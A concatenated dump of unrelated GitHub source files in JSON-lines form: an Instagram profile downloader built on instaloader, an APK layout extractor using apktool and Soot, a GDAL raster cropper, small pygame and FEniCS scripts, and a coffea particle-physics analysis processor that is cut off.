--paths Show the file paths\n --show-references Show build references\n\"\"\" % self.progname)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"yifengyou/koji","sub_path":"BUILD/koji-1.33.0/tests/test_cli/test_list_untagged.py","file_name":"test_list_untagged.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"1601764583","text":"import instaloader\nimport os\n\nL = instaloader.Instaloader()\nL.load_session_from_file(\"username\")\n\nrootWorkingDirectory = os.getcwd() \n\ndef comparator2000(targetUsername: str) -> str:\n '''\n This function check if the ```targetUsername`` folder exists, if not, create one and enter.\n '''\n # Check if exists, if not, create.\n if not os.path.exists(targetUsername):\n os.makedirs(targetUsername)\n \n # Changue directory to targetUsername\n os.chdir(targetUsername)\n return str(f\"Im here {os.getcwd()}, tick.\")\n \n\ndef comparator3000(targetUsername: str, downloadType: str) -> str:\n '''\n This function will test if the directory of the ``targetUsername`` exists, if not create the folder\n and enter, the same for ``downloadType`` which is the name of the media type being downloaded,\n currently are: ``Posts``, ``Stories``, ``Highlights``.\n '''\n\n # Check if dir exists, if not, create.\n if not os.path.exists(targetUsername):\n os.makedirs(targetUsername)\n\n # Changue dir to the target username's\n os.chdir(targetUsername)\n\n # Check if exists the highlights folder if not, create\n if not os.path.exists(downloadType):\n os.makedirs(downloadType)\n\n # Changue working dir to the highlight folder\n os.chdir(downloadType)\n return str(f\"Im here {os.getcwd()}, tick.\")\n\n\ndef downloadHL(Lcontext, targetUsername: str, rootWD):\n\n comparator3000(targetUsername, \"Highlights\")\n\n # Get the list of the aviable highlights os the target and download,\n # every folder, has his original title. 
\n for highlight in L.get_highlights(instaloader.Profile.from_username(Lcontext, targetUsername)):\n print(highlight.cover_url + '\\nCurrently its not possible to download original highlight cover due to InstaLoader Lib.')\n for item in highlight.get_items():\n L.download_storyitem(item, highlight.title)\n\n # Changue the working dir to the given in the function,\n # i recommend to put every profile in a single folder \"root working dir\"\n os.chdir(rootWD)\n return 0\n\ndef downloadStories(Lcontext, targetUsername: str, rootWD):\n\n comparator3000(targetUsername, \"Stories\")\n\n userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n\n for story in L.get_stories([userData.userid]):\n for item in story.get_items():\n L.download_storyitem(item, f\"{str(item.date).replace(' ', '_', 1).replace(':', '-').replace(' ', '')}_UTC\")\n \n os.chdir(rootWD)\n return 0\n\ndef downloadPosts(Lcontext, targetUsername: str, rootWD):\n\n comparator3000(targetUsername, \"Posts\")\n\n userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n\n posts = userData.get_posts()\n\n print(f'Profile: {userData.username}, contain: {posts.count} posts.')\n\n for post in posts:\n L.download_post(post, post.date_utc)\n L.download_comments = True\n L.download_geotags = True\n\n os.chdir(rootWD)\n return 0\n\ndef downloadProfilePic(Lcontext, targetUsername: str, rootWD):\n\n userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n\n comparator3000(targetUsername, \"Profile Pictures\")\n\n \n\n os.chdir(rootWD)\n return 0\n\ndef writeUserMD(Lcontext, targetUsername: str, rootWD):\n comparator2000(targetUsername)\n profileData = instaloader.Profile.from_username(Lcontext, targetUsername)\n # This will download only the user profile to a pretty json file. 
\n instaloader.save_structure_to_file(profileData, f\"{targetUsername}.json\")\n # This will write the resume of the profile in a text file.\n with open(f\"{targetUsername}_resume.txt\", \"w\", encoding=\"utf-8\") as f:\n f.writelines(f\"{profileData.full_name}\\nTotal posts: {profileData.mediacount}\\nTotal Followers: {profileData.followers}\\nFollowing: {profileData.followees}\\n{profileData.biography}\\n{profileData.external_url}\\nSponsors:\\n{profileData.entities}\")\n os.chdir(rootWD)\n return 0\n\n# downloadPosts(L.context, username, rootWorkingDirectory)\n# profileJSON = \"n\"\n# dumpedJSON = json.dumps(profileJSON, sort_keys=True, indent=4, ensure_ascii=False)\n# print(dumpedJSON)\n\n\n# def downloadIGTV(Lcontext, targetUsername: str, rootWD):\n\n# comparator3000(targetUsername, \"IGTV\")\n\n# userData = instaloader.Profile.from_username(Lcontext, targetUsername)\n# igtvPosts = userData.get_igtv_posts()\n\n# for post in igtvPosts:\n# print(post.title) \n","repo_name":"jamesphoenixcode/prettyIL","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"602733495","text":"n = str(input(\"Digite um numero de 0 a 9999:\"))\nuni = n[3]\ndez = n[2]\ncen = n[1] \nmil = n[0] \nprint(\"Unidade:{}\\nDezena:{}\\nCentena:{}\\nMilhar:{}\".format(uni, dez, cen, mil))\n#Serve apenas para 1000 ate 9999, se vier outro numero, da errro\n\n\n\n","repo_name":"kamibarreto/Exercicios","sub_path":"023.py","file_name":"023.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"12902906570","text":"from fenics import * \n#Subdivisions of x and t sections \nxSection = 100\ntSection = 100\n\n#Point definitions for boundary of domain\na = Point(0,0)\nb = Point(100,100)\n\n#Rectangular region of defined mesh \nmesh = RectangleMesh(a,b,xSection, tSection)\nV = FunctionSpace(mesh, 'P', 1)\n\n#Functional representation of B term in Van Deemter Equation\nu_D = Expression('2*x[0]*x[0]/x[1]', degree = 2)\n\n#Defines boundary function and conditions of boundary \ndef boundary(x, onBoundary): \n return onBoundary \nbc = DirichletBC(V, Constant(0), boundary)\n\n#Vector field intepretations of the field V with constant f(0) as a solution\nu = TrialFunction(V)\nv = TestFunction(V)\nf = Constant(0)\n\n#Interpolation of vector field by function \nu_n = interpolate(u_D, V)\nu_n.rename('u', 'initial value')\n\n\n#Use of vector fields and known solution allows function F as expansion \nF = u*v*dx + dt*dot(grad(u), grad(v))*dx - (u_n + dt*f)*v*dx\n\n#Left hand side and right hand sides of vector field \na, L = lhs(F), rhs(F)\n\nu = Function(V)\nu.rename('u', 'solution')\n\n#Function to find conditions such that a==L & u & bc \n#Specific solution for PDE system \nsolve(a == L, u, bc)\n\nplot (u)\nplot(mesh)\n\n#Exporting to vtk format for visualization\nvtkfile = File('NoiseSolution.pvd')\nvtkfile << u \n\n\ninteractive()\n","repo_name":"adpender/Comp50HFinal","sub_path":"NoiseExample.py","file_name":"NoiseExample.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24688888582","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" 针对 apk 文件夹进行基于 SOOT 的布局序列提取,将结果输出到 apk_tokens_dir 目录中(该方法即将废弃)。\n\"\"\"\n\nimport os\nimport platform\nimport shutil\nimport subprocess\nimport 
time\nimport xml.etree.ElementTree as ET\nfrom configparser import ConfigParser\n\nfrom decomp.layout_utils import optimize_sequence\nfrom utils.logging import Loggers\n\ncfg = ConfigParser()\ncfg.read('../config.ini')\n\napk_dir = cfg.get('decode', 'apk_dir')\ntemp_dir = cfg.get('decode', 'temp_dir')\napk_tokens_dir = cfg.get('decode', 'apk_tokens_dir')\n\nandroid_jars = cfg.get('decode', 'android_jars')\nsoot_jar = cfg.get('decode', 'soot_jar')\nsoot_output = cfg.get('decode', 'soot_output')\n\nlog_dir = cfg.get('log', 'log_dir')\n\nTIME_OUT = 300\n\n\ndef remove_dir(path):\n if os.path.exists(path) and os.path.isdir(path):\n shutil.rmtree(path, ignore_errors=True)\n\n\nif __name__ == '__main__':\n\n log = Loggers(level='debug', log_dir=log_dir)\n\n file_abps = []\n\n for f in os.listdir(apk_dir):\n category_dir = os.path.join(apk_dir, f)\n if os.path.isdir(category_dir): # category\n for sub_dir in os.listdir(category_dir):\n sub_dp = os.path.join(category_dir, sub_dir)\n if os.path.isdir(sub_dp): # apk_subdir\n for package_name in os.listdir(os.path.join(sub_dp)):\n fp = os.path.join(sub_dp, package_name)\n if os.path.isfile(fp) and fp.endswith('.apk') and not fp.startswith('.'):\n file_abps.append(fp)\n\n log.logger.info('Layout extraction on ' + str(len(file_abps)) + ' APK(s) started.')\n\n for i, apk_path in enumerate(file_abps):\n # file_name = os.path.splitext(file)[0]\n # apk_path = os.path.join(apk_dir, file)\n _, apk_name = os.path.split(apk_path)\n apktool_out_path = os.path.join(temp_dir, apk_name)\n\n start_time = time.time()\n log.logger.info('(' + str(i + 1) + '/' + str(len(file_abps)) + ') Analysis started on ' + apk_path)\n\n # Run the apktool command\n if platform.system() == 'Windows':\n subprocess.call(['apktool', 'd', apk_path, '-f', '-o', apktool_out_path], shell=True)\n else:\n subprocess.call(['apktool', 'd', apk_path, '-f', '-o', apktool_out_path])\n\n # Check the state of the apktool output directory\n if not os.path.isdir(apktool_out_path):\n log.logger.error('Apktool decoding failed.')\n continue\n\n # Get the package name to use as an identifier\n package = None\n manifest_fp = os.path.join(apktool_out_path, 'AndroidManifest.xml')\n if os.path.isfile(manifest_fp):\n try:\n e = ET.parse(manifest_fp).getroot()\n if e.tag == 'manifest':\n package = e.attrib['package']\n log.logger.info('APK package is parsed: ' + package)\n except ET.ParseError as e:\n # Skip on parse errors\n log.logger.error('AndroidManifest.xml parse error.')\n continue\n if package is None:\n package = apk_name\n log.logger.info('APK package is not parsed, using ' + package + ' to substitute.')\n\n if not os.path.exists(soot_output):\n os.makedirs(soot_output)\n\n cmd = ['java', '-jar', soot_jar,\n '-d', soot_output,\n '-android-jars', android_jars,\n '-package', package,\n '-process-dir', apk_path,\n '-apktool-dir', apktool_out_path,\n '-token-dir', apk_tokens_dir,\n '-process-multiple-dex', '-allow-phantom-refs']\n\n log.logger.info('Soot analysis is running (time out = ' + str(TIME_OUT) +\n 's). 
\n\n        # Run the Soot program and handle its result\n        try:\n            out_bytes = subprocess.check_output(cmd, stderr=subprocess.STDOUT, timeout=TIME_OUT)\n        except subprocess.TimeoutExpired as e:\n            # Handle the timeout\n            log.logger.error(str(type(e)) + ' Soot analysis times out >>> Skip ' + apk_path)\n            log.logger.error(e.output)\n        except subprocess.CalledProcessError as e:\n            # Handle a failed invocation\n            log.logger.error(str(type(e)))\n            utf_message = e.output.decode('utf-8', 'ignore')\n            log.logger.error(utf_message)\n        else:\n            print(out_bytes.decode('utf-8', 'ignore'))\n            tmp_tokens_fp = os.path.join(apk_tokens_dir, package + '-layout.tmp.lst')\n            tokens_fp = os.path.join(apk_tokens_dir, package + '-layout.lst')\n            log.logger.info('Soot finished. Start optimizing soot outputted layout.')\n            if os.path.isfile(tmp_tokens_fp):\n                with open(tokens_fp, 'w') as wf:\n                    line_cnt = 0\n                    with open(tmp_tokens_fp, 'r') as rf:\n                        for j, line in enumerate(rf):\n                            line_sp = line.split()\n                            layout_type = int(line_sp[0])\n                            xml_name = line_sp[1]\n                            tokens = line_sp[2:]\n                            opt_tokens, opt_seq = optimize_sequence(' '.join(tokens))\n                            wf.write(\n                                str(layout_type) + ' ' + xml_name + ' ' + str(len(opt_tokens)) + ' ' + opt_seq + '\\n')\n                            line_cnt = j + 1\n                    if line_cnt == 0:\n                        os.remove(tokens_fp)\n            os.remove(tmp_tokens_fp)\n        finally:\n            remove_dir(apktool_out_path)  # remove the apktool output directory; comment this line out if you still need it\n            remove_dir(soot_output)\n            log.logger.info('Intermediate files produced by Soot and Apktool are removed.')\n        log.logger.info(\n            'Analysis on ' + apk_path + ' finished. It has run for {:.2f} s.'.format(time.time() - start_time))\n\n    log.logger.info('Layout extraction on ' + str(len(file_abps)) + ' APK(s) finished.')\n","repo_name":"xfge/SketchesGeneration","sub_path":"decomp/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4625577385","text":"import game_framework\nfrom pico2d import *\n\nimport Main\n\nname = \"OverState\"\nimage = None\ncharacter_dead = None\nretry = None\nframe = 0.0\n\n#Player Size\nSizeX = 236\nSizeY = 188\n\n# Player Action Speed\nTIME_PER_ACTION = 0.5\nACTION_PER_TIME = 0.3 / TIME_PER_ACTION\nFRAMES_PER_ACTION = 10\n\ndef enter():\n    global image, character_dead, retry\n\n    image = load_image('Resource/UI/Gameover.png')\n    character_dead = load_image('Resource/Death.png')\n    retry = load_image('Resource/UI/retry.png')\n\n\ndef exit():\n    global image, character_dead, retry\n    del(image)\n    del(character_dead)\n    del(retry)\n\n\ndef handle_events():\n    events = get_events()\n    for event in events:\n        if event.type == SDL_QUIT:\n            game_framework.quit()\n        else:\n            if (event.type, event.key) == (SDL_KEYDOWN, SDLK_ESCAPE):\n                game_framework.quit()\n            elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_SPACE):\n                game_framework.change_state(Main)\n\n\ndef draw():\n    global frame\n\n    clear_canvas()\n    image.draw(400, 225)\n    character_dead.clip_draw(int(frame) * SizeX, 0, SizeX, SizeY, 400, 200)\n    if frame >= 9:\n        retry.draw(600, 120)\n    update_canvas()\n\n\ndef update():\n    global frame\n    if frame <= 9:\n        frame = (frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 10\n","repo_name":"kyoungsub/2014180031-2DGP","sub_path":"Game/Over_state.py","file_name":"Over_state.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34429940858","text":"import marshmallow as ma\nfrom oarepo_model_builder.datatypes
 import ModelDataType\n\n\nclass DraftFileDataType(ModelDataType):\n    model_type = \"draft-file\"\n\n    class ModelSchema(ModelDataType.ModelSchema):\n        type = ma.fields.Str(\n            load_default=\"draft-file\",\n            required=False,\n            validate=ma.validate.Equal(\"draft-file\"),\n        )\n\n    def prepare(self, context):\n        self.draft_record = context[\"draft_record\"]\n        self.file_record = context[\"file_record\"]\n        super().prepare(context)\n","repo_name":"oarepo/oarepo-model-builder-drafts-files","sub_path":"oarepo_model_builder_drafts_files/datatypes/draft_file.py","file_name":"draft_file.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25025579800","text":"#!/usr/bin/python\n\"\"\"\nCreated on Thu Dec 27 13:37:32 2018\n@author: Ziyi Gong, Samuel Konat\nVersion: python 3.6\n\"\"\"\n\nimport psycopg2\nfrom math import *\nfrom osgeo import gdal\nfrom osgeo import osr\nfrom affine import Affine\nimport sys\nimport os\n\nR = 6371 # Radius of the Earth\nGS = [64] # Grid sizes in pixels\n\norgLoc = '/home/ubuntu/kynesfield/datasets/original'\ncpdLoc = '/home/ubuntu/kynesfield/datasets/clipped'\n\n# Database details\ndbhost = \"localhost\"\ndbname = \"postgres\"\ndbuser = \"postgres\"\ndbpass = \"kynes\"\ndbconn = None\n\n# Translation variables\nIN = osr.SpatialReference()\nIN.ImportFromEPSG(4326)\nOUT = osr.SpatialReference()\nOUT.ImportFromEPSG(3665)\nTRANS = osr.CoordinateTransformation(IN,OUT)\n\n'''\nParameters:\n    latitude, longitude: coordinates of a point in MRDS data\n    length: the length of the square enclosing the point\n    \n    Returns minx, miny, maxx, and maxy coordinates of the square\n'''\ndef vertices(latitude, longitude, length):\n    # latitude to radians\n    r_lat = latitude * pi / 180\n    \n    a = float(length) / (4 * R)\n    diff_long = asin(sin(a) / cos(r_lat)) * 2 * 180 / pi\n    diff_lat = a * 2 * 180 / pi\n    \n    \n    projWin = TRANS.TransformPoint(longitude - diff_long, latitude + diff_lat)[:-1] + \\\n              TRANS.TransformPoint(longitude + diff_long, latitude - diff_lat)[:-1]\n    \n    return projWin\n    \n\ndef pixel_centered_square(gt, lng, lat, D):\n    forward_trans = Affine.from_gdal(*gt)\n    reverse_trans = ~forward_trans\n    px, py = reverse_trans * (lng, lat)\n    px, py = int(px + 0.5), int(py + 0.5) # round to int pixel coordinate\n    \n    ulx, uly, lrx, lry = px - int(D/2), py - int(D/2), px + int(D/2), py + int(D/2)\n    \n    ulx, uly = forward_trans * (ulx, uly)\n    lrx, lry = forward_trans * (lrx, lry)\n    return (ulx, uly, lrx, lry)\n\n\n'''\n    Reads raster image files, crops rasters based on coordinates in MRDS and \n    stores the cropped rasters into the database\n'''\ndef get_raster_grids(rasters):\n    # Connect to the PostgreSQL database server\n    conn = None\n    try:\n        # Establishing database connection\n        conn = psycopg2.connect(host = dbhost, database = dbname,\n                                user = dbuser, password = dbpass)\n        cur = conn.cursor()\n        cur.execute('SELECT latitude, longitude, site_id FROM t_site;')\n        mrds = cur.fetchall()\n        \n        if rasters is not None:\n            files = rasters\n        else:\n            cur.execute('SELECT filename FROM t_raster_master')\n            files = cur.fetchall()\n\n        cur.execute(\n            \"prepare putrasters as \"\n            \"insert into t_raster_cropped(raster_name,site_id,resolution,filename,filepath) values($1,$2,$3,$4,$5)\")\n\t\n        for D in GS:\n            rsln = str(D) + 'x' + str(D)\n            for fl in files:\n                print('Processing ' + fl[0])\n                fname = fl[0][:-4]\n                dirname = cpdLoc + '/' + rsln + '/' + fname + '/'\n                if not os.path.isdir(dirname):\n                    os.makedirs(dirname)\n\n                for site in mrds:
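\n                    # (added) corners below is (ulx, uly, lrx, lry) in the raster's CRS: a D x D pixel window centred on the site at (lng, lat), which gdal.Translate(projWin=...) crops out into clipd.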
\n                        siteid = str(site[2])\n                        imgname = fname + '_' + siteid + '.tif'\n                        clipd = dirname + imgname\n                        ds = gdal.Open(orgLoc + '/' + rsln + '/' + fl[0])\n                        gt = ds.GetGeoTransform()\n                        corners = pixel_centered_square(gt, site[1], site[0], D)\n                        gdal.Translate(clipd, ds, projWin = corners)\n                        cur.execute('execute putrasters (%s, %s, %s, %s, %s)', \n                                    (fname, siteid, rsln, imgname, dirname))\n\n        conn.commit()\n        # close the communication with the PostgreSQL\n        cur.close()\n    except (Exception, psycopg2.DatabaseError) as error:\n        print(error)\n    finally:\n        if conn is not None:\n            conn.close()\n            print('Database connection closed.')\n\nif __name__ == '__main__':\n    rasters = None\n    if len(sys.argv) > 1:\n        rasters = []\n        for f in sys.argv[1:]:\n            i = f.split('/')\n            rasters.append(i[len(i) - 1])\n\n    get_raster_grids(rasters)\n","repo_name":"AkashPushkar/physical-mine-prediction","sub_path":"dataset_creation/load_rasters.py","file_name":"load_rasters.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22178526776","text":"class Settings():\r\n    \"\"\"A class to store all settings for Alien Invasion.\"\"\"\r\n\r\n    def __init__(self):\r\n        \"\"\"Initialize the game's static settings.\"\"\"\r\n        # Screen settings\r\n        self.screen_width = 1200\r\n        self.screen_height = 800\r\n        self.bg_color = (135, 206, 235)\r\n        \r\n        # Ship settings\r\n        self.ship_speed_factor = 1.5\r\n        self.ship_limit = 3\r\n\r\n        # Bullet settings\r\n        self.bullet_speed_factor = 1\r\n        self.bullet_width = 5\r\n        self.bullet_height = 15\r\n        self.bullet_color = 21, 71, 52\r\n        self.bullets_allowed = 3\r\n\r\n        # Alien settings\r\n        self.alien_speed_factor = 1\r\n        self.fleet_drop_speed = 7\r\n        self.fleet_direction = 1 # 1 = right, -1 = left\r\n\r\n        # How quickly the game speeds up\r\n        self.speedup_scale = 1.1\r\n        # How quickly the alien point values increase\r\n        self.score_scale = 1.5\r\n\r\n        self.initialize_dynamic_settings()\r\n\r\n    def initialize_dynamic_settings(self):\r\n        \"\"\"Initialize settings that change throughout the game\"\"\"\r\n        self.ship_speed_factor = 1.5\r\n        self.bullet_speed_factor = 1\r\n        self.alien_speed_factor = 1\r\n\r\n        self.fleet_direction = 1 # 1 is right, -1 is left\r\n\r\n        # Scoring\r\n        self.caster_points = 14\r\n        self.melee_points = 21\r\n        self.cannon_points = 60\r\n\r\n    def increase_speed(self):\r\n        \"\"\"Increase speed settings\"\"\"\r\n        self.ship_speed_factor *= self.speedup_scale\r\n        self.bullet_speed_factor *= self.speedup_scale\r\n        self.alien_speed_factor *= self.speedup_scale\r\n\r\n        self.caster_points = int(self.caster_points * self.score_scale)\r\n        self.melee_points = int(self.melee_points * self.score_scale)\r\n        self.cannon_points = int(self.cannon_points * self.score_scale)","repo_name":"chavvy/alien-invasion","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20809967828","text":"#!/usr/bin/env python\nimport coffea\nimport numpy as np\nimport awkward as ak\nnp.seterr(divide='ignore', invalid='ignore', over='ignore')\nfrom coffea import hist, processor\nfrom coffea.analysis_tools import PackedSelection\nfrom coffea.lumi_tools import LumiMask\n\nfrom topcoffea.modules.objects import *\nfrom topcoffea.modules.corrections import AttachMuonSF, AttachElectronSF, AttachPerLeptonFR\nfrom topcoffea.modules.selection import *\nfrom topcoffea.modules.paths import 
topcoffea_path\n\n# Check if the values in an array are within a given range\ndef in_range_mask(in_var,lo_lim=None,hi_lim=None):\n\n # Make sure at least one of the cuts is not none\n if (lo_lim is None) and (hi_lim is None):\n raise Exception(\"Error: No cuts specified\")\n\n # Check if the value is greater than the min\n if lo_lim is not None:\n above_min = (in_var > lo_lim)\n else:\n above_min = (ak.ones_like(in_var)==1)\n\n # Check if the value is less than or equal to the max\n if hi_lim is not None:\n below_max = (in_var <= hi_lim)\n else:\n below_max = (ak.ones_like(in_var)==1)\n\n # Return the mask\n return ak.fill_none((above_min & below_max),False)\n\n\nclass AnalysisProcessor(processor.ProcessorABC):\n\n def __init__(self, samples, dtype=np.float32):\n\n self._samples = samples\n self._dtype = dtype\n\n # Create the histograms\n self._accumulator = processor.dict_accumulator({\n \"invmass\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"invmass\", \"$m_{\\ell\\ell}$ (GeV) \", 100, 50, 150)),\n \"njets\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"njets\", \"njets\", 8, 0, 8)),\n \"l0pt\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l0pt\", \"l0pt\", 20, 0, 200)),\n \"l0eta\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l0eta\", \"l0eta\", 20, -2.5, 2.5)),\n \"l1pt\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l1pt\", \"l1pt\", 20, 0, 200)),\n \"l1eta\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l1eta\", \"l1eta\", 20, -2.5, 2.5)),\n })\n\n @property\n def accumulator(self):\n return self._accumulator\n\n @property\n def columns(self):\n return self._columns\n\n # Main function: run on a given dataset\n def process(self, events):\n\n # Dataset parameters\n dataset = events.metadata[\"dataset\"]\n isData = self._samples[dataset][\"isData\"]\n histAxisName = self._samples[dataset][\"histAxisName\"]\n year = self._samples[dataset][\"year\"]\n xsec = self._samples[dataset][\"xsec\"]\n sow = self._samples[dataset][\"nSumOfWeights\"]\n\n datasets = [\"SingleMuon\", \"SingleElectron\", \"EGamma\", \"MuonEG\", \"DoubleMuon\", \"DoubleElectron\", \"DoubleEG\"]\n for d in datasets:\n if d in dataset: dataset = dataset.split('_')[0]\n\n # Set the sampleType (used for MC matching requirement)\n # Does not really matter for this processor, but still need to pass it to the selection function anyway\n conversionDatasets=[x%y for x in ['TTGJets_centralUL%d'] for y in [16,17,18]]\n nonpromptDatasets =[x%y for x in ['TTJets_centralUL%d','DY50_centralUL%d','DY10to50_centralUL%d','tbarW_centralUL%d','tW_centralUL%d','tbarW_centralUL%d'] for y in [16,17,18]]\n sampleType = 'prompt'\n if isData:\n sampleType = 'data'\n elif dataset in conversionDatasets:\n sampleType = 'conversions'\n elif dataset in nonpromptDatasets:\n sampleType = 'nonprompt'\n\n # Initialize objects\n met = events.MET\n e = events.Electron\n mu = events.Muon\n jets = events.Jet\n\n e[\"idEmu\"] = ttH_idEmu_cuts_E3(e.hoe, e.eta, e.deltaEtaSC, e.eInvMinusPInv, e.sieie)\n e[\"conept\"] = coneptElec(e.pt, e.mvaTTHUL, e.jetRelIso)\n mu[\"conept\"] = coneptMuon(mu.pt, mu.mvaTTHUL, mu.jetRelIso, mu.mediumId)\n e[\"btagDeepFlavB\"] = ak.fill_none(e.matched_jet.btagDeepFlavB, -99)\n 
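# (added) ak.fill_none substitutes a sentinel where no jet was matched, e.g. ak.fill_none(ak.Array([1.0, None]), -99) -> [1.0, -99]\n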
        mu[\"btagDeepFlavB\"] = ak.fill_none(mu.matched_jet.btagDeepFlavB, -99)\n\n        if not isData:\n            e[\"gen_pdgId\"] = e.matched_gen.pdgId\n            mu[\"gen_pdgId\"] = mu.matched_gen.pdgId\n            e[\"gen_parent_pdgId\"] = e.matched_gen.distinctParent.pdgId\n            mu[\"gen_parent_pdgId\"] = mu.matched_gen.distinctParent.pdgId\n            e[\"gen_gparent_pdgId\"] = e.matched_gen.distinctParent.distinctParent.pdgId\n            mu[\"gen_gparent_pdgId\"] = mu.matched_gen.distinctParent.distinctParent.pdgId\n\n        # Get the lumi mask for data\n        if year == \"2016\" or year == \"2016APV\":\n            golden_json_path = topcoffea_path(\"data/goldenJsons/Cert_271036-284044_13TeV_Legacy2016_Collisions16_JSON.txt\")\n        elif year == \"2017\":\n            golden_json_path = topcoffea_path(\"data/goldenJsons/Cert_294927-306462_13TeV_UL2017_Collisions17_GoldenJSON.txt\")\n        elif year == \"2018\":\n            golden_json_path = topcoffea_path(\"data/goldenJsons/Cert_314472-325175_13TeV_Legacy2018_Collisions18_JSON.txt\")\n        else:\n            raise ValueError(f\"Error: Unknown year \\\"{year}\\\".\")\n        lumi_mask = LumiMask(golden_json_path)(events.run,events.luminosityBlock)\n\n\n        ################### Object selection ####################\n\n        # Electron selection\n        e[\"isPres\"] = isPresElec(e.pt, e.eta, e.dxy, e.dz, e.miniPFRelIso_all, e.sip3d, getattr(e,\"mvaFall17V2noIso_WPL\"))\n        e[\"isLooseE\"] = isLooseElec(e.miniPFRelIso_all,e.sip3d,e.lostHits)\n        e[\"isFO\"] = isFOElec(e.pt, e.conept, e.btagDeepFlavB, e.idEmu, e.convVeto, e.lostHits, e.mvaTTHUL, e.jetRelIso, e.mvaFall17V2noIso_WP90, year)\n        e[\"isTightLep\"] = tightSelElec(e.isFO, e.mvaTTHUL)\n        # Muon selection\n        mu[\"isPres\"] = isPresMuon(mu.dxy, mu.dz, mu.sip3d, mu.eta, mu.pt, mu.miniPFRelIso_all)\n        mu[\"isLooseM\"] = isLooseMuon(mu.miniPFRelIso_all,mu.sip3d,mu.looseId)\n        mu[\"isFO\"] = isFOMuon(mu.pt, mu.conept, mu.btagDeepFlavB, mu.mvaTTHUL, mu.jetRelIso, year)\n        mu[\"isTightLep\"]= tightSelMuon(mu.isFO, mu.mediumId, mu.mvaTTHUL)\n        # Build loose collections\n        m_loose = mu[mu.isPres & mu.isLooseM]\n        e_loose = e[e.isPres & e.isLooseE]\n        l_loose = ak.with_name(ak.concatenate([e_loose, m_loose], axis=1), 'PtEtaPhiMCandidate')\n\n        # Compute pair invariant masses, for all flavors all signs\n        llpairs = ak.combinations(l_loose, 2, fields=[\"l0\",\"l1\"])\n        events[\"minMllAFAS\"] = ak.min( (llpairs.l0+llpairs.l1).mass, axis=-1)\n\n        # Build FO collection\n        m_fo = mu[mu.isPres & mu.isLooseM & mu.isFO]\n        e_fo = e[e.isPres & e.isLooseE & e.isFO]\n\n        # Attach the lepton SFs to the electron and muons collections (the event selection expects these to be present)\n        AttachElectronSF(e_fo,year=year)\n        AttachMuonSF(m_fo,year=year)\n\n        # Attach per lepton fake rates\n        AttachPerLeptonFR(e_fo, flavor = \"Elec\", year=year)\n        AttachPerLeptonFR(m_fo, flavor = \"Muon\", year=year)\n        m_fo['convVeto'] = ak.ones_like(m_fo.charge)\n        m_fo['lostHits'] = ak.zeros_like(m_fo.charge)\n        l_fo = ak.with_name(ak.concatenate([e_fo, m_fo], axis=1), 'PtEtaPhiMCandidate')\n        l_fo_conept_sorted = l_fo[ak.argsort(l_fo.conept, axis=-1,ascending=False)]\n        events[\"l_fo_conept_sorted\"] = l_fo_conept_sorted\n\n        # Convenient to have l0, l1, l2 on hand\n        l_fo_conept_sorted_padded = ak.pad_none(l_fo_conept_sorted, 3)\n        l0 = l_fo_conept_sorted_padded[:,0]\n        l1 = l_fo_conept_sorted_padded[:,1]\n\n\n        #################### Jets ####################\n\n        # Jet cleaning, before any jet selection\n        vetos_tocleanjets = ak.with_name( l_fo, \"PtEtaPhiMCandidate\")\n        tmp = ak.cartesian([ak.local_index(jets.pt), vetos_tocleanjets.jetIdx], nested=True)\n        cleanedJets = jets[~ak.any(tmp.slot0 == 
